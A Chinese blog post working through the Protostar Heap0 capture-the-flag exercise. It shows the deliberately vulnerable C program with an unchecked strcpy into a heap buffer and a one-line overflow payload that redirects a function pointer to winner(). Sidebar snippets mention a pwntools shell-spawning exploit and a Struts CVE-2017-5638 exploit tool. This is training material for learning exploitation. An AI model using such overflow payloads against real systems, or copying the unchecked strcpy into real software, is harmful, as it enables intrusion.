PWN:Protostar Heap0

已于 2022-10-19 18:07:37 修改
阅读量112 收藏
点赞数
分类专栏: pwn 文章标签: c语言
于 2022-10-19 18:06:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53932372/article/details/127413105
版权

Protostar Heap0

代码如下

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

struct data {
  char name[64];
};

struct fp {
  int (*fp)();
};

void winner()
{
  printf("level passed\n");
}

void nowinner()
{
  printf("level has not been passed\n");
}

int main(int argc, char **argv)
{
  struct data *d;
  struct fp *f;

  d = malloc(sizeof(struct data));
  f = malloc(sizeof(struct fp));
  f->fp = nowinner;

  printf("data is at %p, fp is at %p\n", d, f);

  strcpy(d->name, argv[1]);
  
  f->fp();
}

checksec检测

[*] '/Hackery/pod/modules/heap_overflow/protostart_heap0/heap0'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

目前我没有找到原来的文件。

漏洞分析

这道题目洞是很明确的,甚至来讲有些无聊。但是目前没有找到原版的文件,所以只能自己写代码,自己生成来调试。

但是,对于传递参数来讲,我却陷入了迷惑。
如何让传入的参数是byte,而不是我们一般传入的字符呢?

我不太理解答案的做法,因为我没有复现成功。

答案的做法如下:

./heap0 `python -c 'print "A"*72+"\x64\x84\x04\x08"'`
we have a whole life
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn:Pwn技术的集合
05-13
wn Pwn技术的集合
Protostar Heap Write Up
无节操
12-04 1256
protostar heap write up
exploit-exercises Protostar Heap Walkthrough
Casuall的博客
08-09 807
HeapProtostar Heap0AboutSource codeProtostar heap1AboutSource codeexpProtostar heap2AboutSource codeProtostar Heap3AboutSource codeexp 题目来源exploit-exercises Protostar Heap0 About This level introduces heap overflows and how they can influence code flow. Th
Protostar Heap3 (hack the heap algorithm)
AlwaysBetter
09-05 6962
学习pwn快一个月了,从栈溢出,到格式化字符串漏洞,再到return to libc,再到heap UAF,double free,因为学习的protostar没有现代化防护手段,一路上比较顺利. 而在protostar堆类最后一道挑战,遇到了一些障碍,停滞了两天,不过好在liveoverflow讲的十分清晰,重复听了几遍,逐渐明白,这里记录下一个题解吧,作为我的pwn专栏第一篇文章 题目: 目标 使程序执行winner() 思路 首先可以确认的是,我们可以利用strcpy覆写堆中内容,想要执行win.
classic heap unlink exploit(protostar Heap3)
MillionSky的专栏
05-23 663
1 概述https://exploit-exercises.com/protostar/heap3/本题展示了classic heap unlink exploit。 前置技能:要了解ptmalloc堆;熟悉classic heap unlink exploit。2 题目Heap3.c#include &lt;stdlib.h&gt;#include &lt;unistd.h&gt;#includ...
exploit-exercises Protostar Stack Walkthrough
Casuall的博客
08-03 1024
做了一组关于栈溢出的练习,题目来源exploit-exercises,提供一个虚拟机镜像,可以下载下来自己耍耍。 StackStack0AboutSource codeEXPStack1AboutSource codeEXPStack2AboutSource codeEXPStack3AboutSource codeEXPStack4AboutSource codeEXPStack5AboutSource codeStack6AboutSource codeStack7AboutSource codeexp
二进制安全虚拟机Protostar靶场(5)堆的简单介绍以及实战 heap0
Ba1_Ma0的博客
01-28 1320
堆是一个很难的部分,为了方便入门,这篇文章只是简单的介绍了一些堆的运作机制,之后的文章再慢慢介绍其他的机制
二进制安全虚拟机Protostar靶场(8)heap3 Fastbins unlink exploit
最新发布
cc123489ll的博客
05-06 696
这里举一个例子,我们用file工具查看文件信息可以发现他是动态链接库的,意思是从libc里调用的函数比如这里的gets函数,他不是二进制文件本身里面自带的,而从本机上的libc库中调用的,这样就能缩小文件体积而plt表的作用是当程序需要调用一个外部函数时,它首先跳转到PLT表中寻找该函数对应的入口,PLT入口包含跳转指令,然后跳转到GOT表中的相应地址,GOT中的地址会指向解析函数,之后解析函数将实际的函数地址写入GOT表,以便后续直接跳转调用函数。
ptmalloc堆概述
MillionSky的专栏
05-10 1504
ptmalloc堆概述1 概述堆的概念在程序运行过程中,堆可以提供动态分配的内存,允许程序申请大小未知的内存。堆其实就是程序虚拟地址空间的一块连续的线性区域,它由低地址向高地址方向增长。 堆管理器我们一般称管理堆的那部分程序为堆管理器。· dlmalloc – General purpose allocator· ptmalloc2 – glibc· jemalloc – FreeBSD and ...
pwn:pwnpi 的 pwn 东西
06-14
pwn pwnpi 的 pwn 东西这东西有一天应该做什么: 检查可能的网络连接 -- LAN -- WLAN -- 3G 如果连接可用,提供 -- 反向隧道 -- 在该网络中嗅探 -- 该网络中的 autometasploit -- nmap 扫描该网络 -- 创建 Evil Twin...
browser_pwn:浏览器pwn,现在主要工作
03-22
browser_pwn 浏览器pwn,现在主要工作。 v8_pwn v8开发 jsc_pwn 对jsc的利用
pwn:JavaScript事件系统的100 SLOC处理
05-15
使用obj.prototype = Object.create(pwn); pwn您的对象没错-甚至不必担心您的构造函数-那是一些伪古典的垃圾。 你把它铺好了。 注册新的事件监听器 // obj.on(event, callback, context)obj . on ( 'change' , func...
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
pwntools:类型转换
m0_53932372的博客
09-08 4488
byte和str 首先一定要注意,byte和str在python里面有明确的区分,尤其是在做pwn的题目时,一定要注意这个问题。 参考链接:https://www.cnblogs.com/mlgjb/p/7899534.html hex hex(x) x -- 10进制整数 返回16进制数,以字符串形式表示。 p32、p64 p32(x) x-- 一个整型数据 返回byte型。 u32、u64 u32(x) x-- byte型 返回整型。 int类型转换 int(a,base=x)
PWN:pwntools的安装
m0_53932372的博客
07-01 2345
pwntools sudo apt update sudo apt install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential (安装pip3) pip3 -v (查看版本) pip换源 在根目录下创建文件夹: .pip 在.pip里创建文件: pip.conf 自行安装vim sudo apt vim 使用vim libcsearch pwndbg peda gef ......
攻防世界:PWN刷题-forgot
m0_53932372的博客
12-30 2251
forgot 这题,可有意思了。 大晚上的,有点迷。看了几个wp,一个比一个离谱(太简单了)。 后来自己试了试,还真是······ 思路:本题出现了指针变量并且进行了调用,所以可以利用栈溢出漏洞将该地址覆盖为后门函数的地址,让程序正常执行就可以拿到flag。 坑:一定要注意啊对v5的判定。 v5初值为1,进过下面的判断等操作后,其值被改变,而v5的值决定了程序调用那个指针所指的位置。 exp一定要注意,输入的v2的第一个字符,决定了v5的值。 当输入a的时候,经过判定,v5会变成2,则调用第2-1=1,也
攻防世界:PWN刷题-反应釜开关控制
m0_53932372的博客
12-30 2005
反应釜开关控制 思路:没有开启pie,并且直接有system("/bin/sh"); 和ret2text方法一样。 exp: #!/usr/bin/python from pwn import * p = remote(“111.200.241.244”,52515) payload=b’a’*512+b’b’*8+p64(0x00004005F6) p.sendline(payload) p.interactive() ...
0xdeadbeef pwn
08-30
根据提供的引用内容,0xdeadbeef是一个参数值,可能在程序中被使用。在引用中,0xdeadbeef被存储在一个参数key的空间地址中。在引用中,这个参数被传递给了func函数,并且在gets函数中使用了。如果传入的参数等于0...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值